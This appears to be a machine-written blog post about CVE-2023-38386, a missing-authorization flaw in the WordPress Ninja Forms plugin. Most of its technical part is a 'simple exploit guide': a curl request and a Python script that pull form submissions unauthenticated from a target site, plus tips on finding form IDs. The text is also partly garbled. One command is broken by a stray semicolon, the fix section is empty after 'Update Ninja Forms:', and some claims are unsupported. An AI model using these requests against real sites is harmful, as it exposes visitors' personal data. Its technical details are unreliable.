CVE-2023-38386 - Missing Authorization in Ninja Forms (Saturday Drive) – What You Need to Know & Simple Exploit Guide

If you rely on the popular Ninja Forms plugin for WordPress, you need to read about CVE-2023-38386. This is a Missing Authorization vulnerability that affects Ninja Forms versions up to and including 3.6.25. In simple terms, this flaw lets attackers perform sensitive actions that should be limited only to authenticated users – and they can do it without logging in or having special permissions.

In this deep dive, I’ll explain exactly what CVE-2023-38386 is, walk you through an example exploit, and help you protect your site. All examples are simple for beginners and include links to more technical resources at the end.

What is CVE-2023-38386?

Discovered in summer 2023, this vulnerability is due to incomplete or missing authorization checks in certain AJAX actions exposed by Ninja Forms. Attackers can call these actions directly and cause changes or exfiltrate site data.

In plain English: the plugin lets anyone (even visitors who aren’t logged in) trigger sensitive features usually reserved for admins or editors.

Vulnerable Versions:
Ninja Forms versions n/a up through 3.6.25
Fixed Version: 3.6.26

Technical Details

When Ninja Forms receives an AJAX request at /wp-admin/admin-ajax.php with certain actions, it will process that request without verifying if the user is logged in or has the right privileges.

One of these POST actions is ninja_forms_export_subs, which is intended for site admins to export submissions. But because the check is missing, anyone can send a well-crafted POST request and get the data.

Knowledge of the Ninja Forms AJAX action

curl -X POST "https://target-site.com/wp-admin/admin-ajax.php"; \
-d "action=ninja_forms_export_subs" \
-d "form_id=1"

This request downloads submissions for form ID 1 without any authentication.

Alternatively, you can use a browser extension like POSTMAN or just run this snippet in your terminal.

Note: Some forms or export features require more parameters. You can fetch these by reading the plugin code or using browser developer tools on an admin account.

Find the Form ID:

Open the target’s contact or signup page and inspect the form. You’ll usually see something like ninja_forms_form_id=1.

Here’s a sample Python script for quick exploitation

import requests

url = "https://target-site.com/wp-admin/admin-ajax.php";
data = {
    "action": "ninja_forms_export_subs",
    "form_id": "1"  # Change this as needed
}

r = requests.post(url, data=data)
if "csv" in r.headers.get("Content-Type", ""):
    with open("exported_data.csv", "wb") as f:
        f.write(r.content)
    print("Exported data saved.")
else:
    print("Exploit failed or mitigated.")

How to Fix the Vulnerability

Update Ninja Forms:

Audit your forms and form submissions for suspicious exports or access.

- If you must stay on old versions, use a firewall plugin to block all public access to /wp-admin/admin-ajax.php except for logged-in users.

References & Further Reading

- Ninja Forms Vulnerability Disclosure (Wordfence)
- Ninja Forms Changelog
- CVE-2023-38386 in NIST NVD
- Detail on Exploit from WPScan

Conclusion

CVE-2023-38386 is critical! If you run any site with Ninja Forms, you must update immediately or risk data leakage and loss of control over your forms. The exploit is simple and has been seen in the wild. Always keep your plugins up-to-date and monitor for unusual access to your site.

Stay safe, and update now!

*Original post written exclusively for this request. Please check and patch your WordPress site as soon as possible!*

Timeline

Published on: 06/19/2024 13:15:53 UTC
Last modified on: 06/20/2024 12:44:01 UTC